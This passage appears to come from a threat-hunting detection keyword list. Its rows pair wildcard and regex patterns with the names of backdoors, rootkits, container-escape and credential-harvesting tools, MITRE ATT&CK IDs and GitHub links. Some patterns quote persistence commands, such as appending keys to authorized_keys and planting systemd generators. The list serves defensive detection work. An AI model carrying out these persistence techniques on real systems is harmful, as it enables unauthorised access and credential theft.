918*Backdoor.MSIL.Sandman*.{0,1000}Backdoor\.MSIL\.Sandman.{0,1000}signature_keywordSandmanSandman is a NTP based backdoor for red team engagements in hardened networks.T1105 - T1027 - T1071.001TA0011 - TA0005N/AN/APersistencehttps://github.com/Idov31/Sandman10#AvsignatureN/A1087851082024-03-31T17:40:15Z2022-08-21T11:04:45Z35177
919*backdoor.sh -v * -p *.{0,1000}backdoor\.sh\s\-v\s.{0,1000}\s\-p\s.{0,1000}offensive_tool_keywordlinux-pam-backdoorLinux PAM BackdoorT1547.001 - T1556.003TA0003 - TA0004N/AN/APersistencehttps://github.com/zephrax/linux-pam-backdoor10#linuxN/A104328852023-11-13T11:29:44Z2017-06-08T21:14:34Z35182
920*bashRCPersistence*.{0,1000}bashRCPersistence.{0,1000}offensive_tool_keywordD3m0n1z3dShellDemonized Shell is an Advanced Tool for persistence in linuxT1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011N/AN/APersistencehttps://github.com/MatheuZSecurity/D3m0n1z3dShell10#linuxN/A104373542025-01-05T13:56:51Z2023-05-30T02:30:47Z35309
921*bb6ca78dc8a3774eb3db52580c52bc6b47ca885d9881f5cb422c915ca2c2a7a9*.{0,1000}bb6ca78dc8a3774eb3db52580c52bc6b47ca885d9881f5cb422c915ca2c2a7a9.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z35356
922*bbae26473d5ca41404788c5b58ab495e9b7fdd988986657be0e0505400047207*.{0,1000}bbae26473d5ca41404788c5b58ab495e9b7fdd988986657be0e0505400047207.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z35388
923*bc40d2839a4942652d9a765b64a024b600b2dd3b3205f845d77b93d458b039b9*.{0,1000}bc40d2839a4942652d9a765b64a024b600b2dd3b3205f845d77b93d458b039b9.{0,1000}greyware_tool_keyworddropbearA smallish SSH server and clientT1021.004 - T1570TA0003N/ACOZY BEARPersistencehttps://github.com/mkj/dropbear10#filehashN/A81018514112025-03-16T12:50:35Z2013-03-19T11:15:36Z35438
924*bca1f1c7d9253bafb3442c4dd95a0b18a82be404ab9442a373b2ff91a47f5164*.{0,1000}bca1f1c7d9253bafb3442c4dd95a0b18a82be404ab9442a373b2ff91a47f5164.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z35466
925*BCE48DAE-232E-4B3D-B5B5-D0B29BB7E9DE*.{0,1000}BCE48DAE\-232E\-4B3D\-B5B5\-D0B29BB7E9DE.{0,1000}offensive_tool_keywordr77-rootkitFileless ring 3 rootkit with installer and persistence that hides processes, files, network connectionsT1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009TA0005 - TA0003N/AN/APersistencehttps://github.com/bytecode77/r77-rootkit10#GUIDprojectN/A101018844252025-03-25T17:59:20Z2017-12-17T13:04:14Z35497
926*bd3e5f1a848ec10158f529073a346f56c08a18c1e4cbfa1a85714037fe1561fe*.{0,1000}bd3e5f1a848ec10158f529073a346f56c08a18c1e4cbfa1a85714037fe1561fe.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z35525
927*bd4c534c458ff68d34112516e281ba763093dcb9ab531ccc3e6c95b5aef667d8*.{0,1000}bd4c534c458ff68d34112516e281ba763093dcb9ab531ccc3e6c95b5aef667d8.{0,1000}greyware_tool_keyworddropbearA smallish SSH server and clientT1021.004 - T1570TA0003N/ACOZY BEARPersistencehttps://github.com/mkj/dropbear10#filehashN/A81018514112025-03-16T12:50:35Z2013-03-19T11:15:36Z35529
928*BD745A5E-A1E9-4FDD-A15B-E9F303A625AE*.{0,1000}BD745A5E\-A1E9\-4FDD\-A15B\-E9F303A625AE.{0,1000}offensive_tool_keywordRedPersistRedPersist is a Windows Persistence tool written in C#T1053 - T1547 - T1112TA0004 - TA0005 - TA0040N/AN/APersistencehttps://github.com/mertdas/RedPersist10#GUIDprojectN/A103215332024-03-10T15:40:05Z2023-08-13T22:10:46Z35543
929*bd745a5e-a1e9-4fdd-a15b-e9f303a625ae*.{0,1000}bd745a5e\-a1e9\-4fdd\-a15b\-e9f303a625ae.{0,1000}offensive_tool_keywordRedPersistRedPersist is a Windows Persistence tool written in C#T1053 - T1547 - T1112TA0004 - TA0005 - TA0040N/AN/APersistencehttps://github.com/mertdas/RedPersist10#GUIDprojectN/A103215332024-03-10T15:40:05Z2023-08-13T22:10:46Z35544
930*beafc9e9d828c755348ee00e6afbcfa79072741353a8509881e13da012a27509*.{0,1000}beafc9e9d828c755348ee00e6afbcfa79072741353a8509881e13da012a27509.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z35735
931*Ben0xA/DoUCMe*.{0,1000}Ben0xA\/DoUCMe.{0,1000}offensive_tool_keyworddoucmeleverages the NetUserAdd Win32 API to create a new computer accountT1136 - T1098 - T1078TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Ben0xA/DoUCMe11N/AN/A9169182021-05-01T03:15:59Z2021-04-29T15:41:28Z35810
932*BetterBackdoor*.{0,1000}BetterBackdoor.{0,1000}offensive_tool_keywordBetterBackdoorA backdoor is a tool used to gain remote access to a machine.T1071 - T1055 - T1059 - T1053TA0002 - TA0006 - TA0008N/AN/APersistencehttps://github.com/thatcherclough/BetterBackdoor11N/AN/AN/A3280862024-10-03T18:44:04Z2019-07-29T14:45:24Z35826
933*bf07c8fc6c899e793274614b8a98565fbedba9516c437c7594fec9fa15dd4d41*.{0,1000}bf07c8fc6c899e793274614b8a98565fbedba9516c437c7594fec9fa15dd4d41.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z35842
934*bf436bdcf33e8567d57edad7e673c9bcf6b4eb9a514d95c94a85418e964e4f8d*.{0,1000}bf436bdcf33e8567d57edad7e673c9bcf6b4eb9a514d95c94a85418e964e4f8d.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z35852
935*bfa3e36c356afe0742ffc32a3693257aacf59a671b07f695e31bd0f334fe0421*.{0,1000}bfa3e36c356afe0742ffc32a3693257aacf59a671b07f695e31bd0f334fe0421.{0,1000}offensive_tool_keywordWinPirateautomated sticky keys backdoor + credentials harvestingT1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003TA0003 - TA0005 - TA0006N/AN/APersistencehttps://github.com/l3m0n/WinPirate10#filehashN/A9113322016-07-17T20:02:07Z2016-07-18T03:40:13Z35878
936*BKDR_TERMITE.A*.{0,1000}BKDR_TERMITE\.A.{0,1000}signature_keywordTermiteTermite rootit abused by threat actorsT1014 - T1069 - T1055TA0005 - TA0003 - TA0004Operation TunnelSnakeWhiteflyPersistencehttps://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a410#AvsignatureN/A10101561772021-01-26T23:16:49Z2019-01-03T05:01:20Z36001
937*BloodSecurity Hackers Shell*.{0,1000}BloodSecurity\sHackers\sShell.{0,1000}offensive_tool_keywordOWASP rulesOWASP repo of rules - extracted strings for detectionT1100 - T1505.003 - T1059.001TA0003N/AN/APersistencehttps://github.com/coreruleset/coreruleset/10N/Aphp title webshell71025364032025-04-22T10:55:49Z2020-05-13T11:28:52Z36091
938*Booty\master_password_list.csv*.{0,1000}Booty\\master_password_list\.csv.{0,1000}offensive_tool_keywordWinPirateautomated sticky keys backdoor + credentials harvestingT1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003TA0003 - TA0005 - TA0006N/AN/APersistencehttps://github.com/l3m0n/WinPirate10N/AN/A9113322016-07-17T20:02:07Z2016-07-18T03:40:13Z36194
939*browsinghistoryview.exe*.{0,1000}browsinghistoryview\.exe.{0,1000}offensive_tool_keywordWinPirateautomated sticky keys backdoor + credentials harvestingT1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003TA0003 - TA0005 - TA0006N/AN/APersistencehttps://github.com/l3m0n/WinPirate10N/AN/A9113322016-07-17T20:02:07Z2016-07-18T03:40:13Z36265
940*BrowsingHistoryView.html*.{0,1000}BrowsingHistoryView\.html.{0,1000}offensive_tool_keywordWinPirateautomated sticky keys backdoor + credentials harvestingT1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003TA0003 - TA0005 - TA0006N/AN/APersistencehttps://github.com/l3m0n/WinPirate10N/AN/A9113322016-07-17T20:02:07Z2016-07-18T03:40:13Z36267
941*Building ABPTTS configuration *.{0,1000}Building\sABPTTS\sconfiguration\s.{0,1000}offensive_tool_keywordABPTTSTCP tunneling over HTTP/HTTPS for web application serversT1071.001 - T1573TA0003 - TA0011N/AN/APersistencehttps://github.com/nccgroup/ABPTTS10N/AN/A987351512016-08-12T19:36:24Z2016-07-29T21:45:57Z36385
942*bytecode77/r77-rootkit*.{0,1000}bytecode77\/r77\-rootkit.{0,1000}offensive_tool_keywordr77-rootkitFileless ring 3 rootkit with installer and persistence that hides processes, files, network connectionsT1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009TA0005 - TA0003N/AN/APersistencehttps://github.com/bytecode77/r77-rootkit11N/AN/A101018844252025-03-25T17:59:20Z2017-12-17T13:04:14Z36525
943*c:\123.txt*.{0,1000}c\:\\123\.txt.{0,1000}offensive_tool_keywordSharPersistSharPersist Windows persistence toolkit written in C#.T1547 - T1053 - T1027 - T1028 - T1112TA0003 - TA0008N/AN/APersistencehttps://github.com/fireeye/SharPersist10N/AN/A101014602572023-08-11T00:52:09Z2019-06-21T13:32:14Z36559
944*c:\temp\history.csv*.{0,1000}c\:\\temp\\history\.csv.{0,1000}offensive_tool_keywordWinPirateautomated sticky keys backdoor + credentials harvestingT1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003TA0003 - TA0005 - TA0006N/AN/APersistencehttps://github.com/l3m0n/WinPirate10N/AN/A9113322016-07-17T20:02:07Z2016-07-18T03:40:13Z36584
945*c:\temp\history.html*.{0,1000}c\:\\temp\\history\.html.{0,1000}offensive_tool_keywordWinPirateautomated sticky keys backdoor + credentials harvestingT1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003TA0003 - TA0005 - TA0006N/AN/APersistencehttps://github.com/l3m0n/WinPirate10N/AN/A9113322016-07-17T20:02:07Z2016-07-18T03:40:13Z36585
946*c:\temp\history.txt*.{0,1000}c\:\\temp\\history\.txt.{0,1000}offensive_tool_keywordWinPirateautomated sticky keys backdoor + credentials harvestingT1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003TA0003 - TA0005 - TA0006N/AN/APersistencehttps://github.com/l3m0n/WinPirate10N/AN/A9113322016-07-17T20:02:07Z2016-07-18T03:40:13Z36586
947*C:\Users\*\AppData\Roaming\Indexing.*.{0,1000}C\:\\Users\\.{0,1000}\\AppData\\Roaming\\Indexing\..{0,1000}offensive_tool_keywordJunctionFolderCreates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.T1547.001 - T1574.001 - T1204.002TA0005 - TA0004N/AN/APersistencehttps://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder10N/AN/A101014162502023-02-06T14:56:26Z2019-02-06T00:32:29Z36595
948*c02322e9bf5f1a0655cdaf316371f91257b9008d2ee6dde791bac5e8b2e5064d*.{0,1000}c02322e9bf5f1a0655cdaf316371f91257b9008d2ee6dde791bac5e8b2e5064d.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z36640
949*c042f360a6deff1b41405dd0f5bee637fc8242d585c714410084ef068a90d9fc*.{0,1000}c042f360a6deff1b41405dd0f5bee637fc8242d585c714410084ef068a90d9fc.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z36652
950*c142ea52e700259405c0de3aae652fcbbe9d476ca40aafb4309c60538d03f6a0*.{0,1000}c142ea52e700259405c0de3aae652fcbbe9d476ca40aafb4309c60538d03f6a0.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z36724
951*c2656885d23a89c0ce5ecb131762889fe7c39ff2cf4a8b6d8db2c9d782fb94bd*.{0,1000}c2656885d23a89c0ce5ecb131762889fe7c39ff2cf4a8b6d8db2c9d782fb94bd.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z36805
952*c346565a022b0f0c4957c33226e8b7a3d3359f8da8eeb97e60b50d6d3e1dea79*.{0,1000}c346565a022b0f0c4957c33226e8b7a3d3359f8da8eeb97e60b50d6d3e1dea79.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z36905
953*c3663dba552ca6aa8d2c0f36fccc553d728b37464944080398f72f487430710f*.{0,1000}c3663dba552ca6aa8d2c0f36fccc553d728b37464944080398f72f487430710f.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#filehash #linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z36916
954*c417429bfef774a5aad6d5a745b741f291fc0bd1b48514bfd4fbca9345e43384*.{0,1000}c417429bfef774a5aad6d5a745b741f291fc0bd1b48514bfd4fbca9345e43384.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z36973
955*c52ebc7882d730dcd1d32551e8ed3eca5997f56079efb92c591e62292d3c0c09*.{0,1000}c52ebc7882d730dcd1d32551e8ed3eca5997f56079efb92c591e62292d3c0c09.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z37047
956*c5e6f5bd9b5c828645a7c77f07a4a5973a3904d2a9ae01b2cb0ad2574bf2c8d9*.{0,1000}c5e6f5bd9b5c828645a7c77f07a4a5973a3904d2a9ae01b2cb0ad2574bf2c8d9.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z37110
957*c68ea57d7555c49ef4c5ea05363fe0ced7978e751331ea949005d70fff000a00*.{0,1000}c68ea57d7555c49ef4c5ea05363fe0ced7978e751331ea949005d70fff000a00.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z37145
958*c6986103a201b81ebf196dd945c4bf5b1992b4fd8db03479d7be2595a5c467fc*.{0,1000}c6986103a201b81ebf196dd945c4bf5b1992b4fd8db03479d7be2595a5c467fc.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z37153
959*c6b8be2b81f56a9f4330f7ccae161bda9de8deaf375bb8d1150264aa6fb502e9*.{0,1000}c6b8be2b81f56a9f4330f7ccae161bda9de8deaf375bb8d1150264aa6fb502e9.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z37163
960*c7fa65795c3627674274f83ccab5776c80922708787a2121ac4d5cfd02551fc4*.{0,1000}c7fa65795c3627674274f83ccab5776c80922708787a2121ac4d5cfd02551fc4.{0,1000}offensive_tool_keywordDispossessorscript used to install anydesk by the Dispossessor groupT1486 - T1490 - T1059 - T1213 - T1078TA0040 - TA0043 - TA0001 - TA0009N/ADispossessorPersistencehttps://vx-underground.org/Archive/Dispossessor%20Leaks10N/AN/A1010N/AN/AN/AN/A37255
961*c8664d51b579d5922ab8325a777048d8d661baf2767744829becb979784f76d9*.{0,1000}c8664d51b579d5922ab8325a777048d8d661baf2767744829becb979784f76d9.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z37283
962*c9203ada65ee8c0c96d177343c3ae42592f4486e5ef05bce0dab3108e9935862*.{0,1000}c9203ada65ee8c0c96d177343c3ae42592f4486e5ef05bce0dab3108e9935862.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z37337
963*c9bdad45179ca59d8b6b725d329b8ab1ba8e1561c44cc3a14093bfe3c97df3ae*.{0,1000}c9bdad45179ca59d8b6b725d329b8ab1ba8e1561c44cc3a14093bfe3c97df3ae.{0,1000}offensive_tool_keywordtsh-goTiny SHell Go - An open-source backdoor written in GoT1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009TA0003 - TA0005 - TA0011 - TA0010N/AN/APersistencehttps://github.com/CykuTW/tsh-go10#filehashN/A102161162024-08-29T02:59:37Z2022-06-13T16:25:30Z37381
964*c9d9c56c1eb6891ede852ccc96dc343afbd5057ab0451bc75ba7095203f0762a*.{0,1000}c9d9c56c1eb6891ede852ccc96dc343afbd5057ab0451bc75ba7095203f0762a.{0,1000}offensive_tool_keywordSunderWindows rootkit designed to work with BYOVD exploitsT1543.003 - T1562.001 - T1547.001 - T1068 - T1548.002TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/ColeHouston/Sunder10#filehashN/A102183202025-01-18T10:41:50Z2025-01-10T03:57:05Z37391
965*ca6d09368c87c863029065d8d134bea7edefe73e270b599336185bec60dc68ab*.{0,1000}ca6d09368c87c863029065d8d134bea7edefe73e270b599336185bec60dc68ab.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z37450
966*cat *.pub >> */authorized_keys*.{0,1000}cat\s.{0,1000}\.pub\s\>\>\s.{0,1000}\/authorized_keys.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z37600
967*cat <<-EOF > /usr/lib/systemd/system-generators/generator*.{0,1000}cat\s\<\<\-EOF\s\>\s\/usr\/lib\/systemd\/system\-generators\/generator.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z37619
968*cbfe1884821d8aa5cb10a0eec8719f8273b5a65f2ae826c7079006fff71f14e7*.{0,1000}cbfe1884821d8aa5cb10a0eec8719f8273b5a65f2ae826c7079006fff71f14e7.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z37706
969*cca9d8bb94c36f2e971f834b980801d3fefd23fd8a25852867bb1be94d116963*.{0,1000}cca9d8bb94c36f2e971f834b980801d3fefd23fd8a25852867bb1be94d116963.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z37778
970*ccbc5c84af4045835e6b001cdf845d63802e081cbb97d9625c12d8d0f9b6f852*.{0,1000}ccbc5c84af4045835e6b001cdf845d63802e081cbb97d9625c12d8d0f9b6f852.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z37789
971*cdac5cd3d0ff424315da3e233a79f72663c26e53fc4ac2e5031ea08154630514*.{0,1000}cdac5cd3d0ff424315da3e233a79f72663c26e53fc4ac2e5031ea08154630514.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z37889
972*cdf9041ba0603c7d7452a2866eee0eaa115ad5d8488d92c1c388c36d321301b1*.{0,1000}cdf9041ba0603c7d7452a2866eee0eaa115ad5d8488d92c1c388c36d321301b1.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z37916
973*CDK auto exploit via K8s backdoor daemonset*.{0,1000}CDK\sauto\sexploit\svia\sK8s\sbackdoor\sdaemonset.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#contentN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z37918
974*cdk run mount-cgroup *shell-cmd-payloads*.{0,1000}cdk\srun\smount\-cgroup\s.{0,1000}shell\-cmd\-payloads.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linuxN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z37919
975*cdk-fabric run service-probe 127.0.0.1*.{0,1000}cdk\-fabric\srun\sservice\-probe\s127\.0\.0\.1.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linuxN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z37920
976*cdk-team/CDK*.{0,1000}cdk\-team\/CDK.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK11#linuxN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z37921
977*cf25b9f3-849e-447f-a029-2fef5969eca3*.{0,1000}cf25b9f3\-849e\-447f\-a029\-2fef5969eca3.{0,1000}offensive_tool_keywordCreateServiceCreating a persistent serviceT1543.003 - T1547.001 - T1050TA0003N/AN/APersistencehttps://github.com/uknowsec/CreateService10#GUIDprojectN/A42105272021-04-26T06:43:12Z2020-09-23T05:03:52Z38050
978*cf649763c47c27458c5af325697d002c0768efb7b45e5a0246d529519df56ea4*.{0,1000}cf649763c47c27458c5af325697d002c0768efb7b45e5a0246d529519df56ea4.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z38066
979*cfalta/PoshADCS*.{0,1000}cfalta\/PoshADCS.{0,1000}offensive_tool_keywordPoshADCSattack vectors against Active Directory by abusing Active Directory Certificate Services (ADCS)T1213.003 - T1213 - T1098.003 - T1098 - T1484.001TA0002 - TA0003 - TA0040N/AN/APersistencehttps://github.com/cfalta/PoshADCS11N/AN/A72186172021-07-07T16:47:07Z2019-10-15T15:54:03Z38085
980*chmod +x /usr/lib/systemd/system-generators/makecon*.{0,1000}chmod\s\+x\s\/usr\/lib\/systemd\/system\-generators\/makecon.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z38188
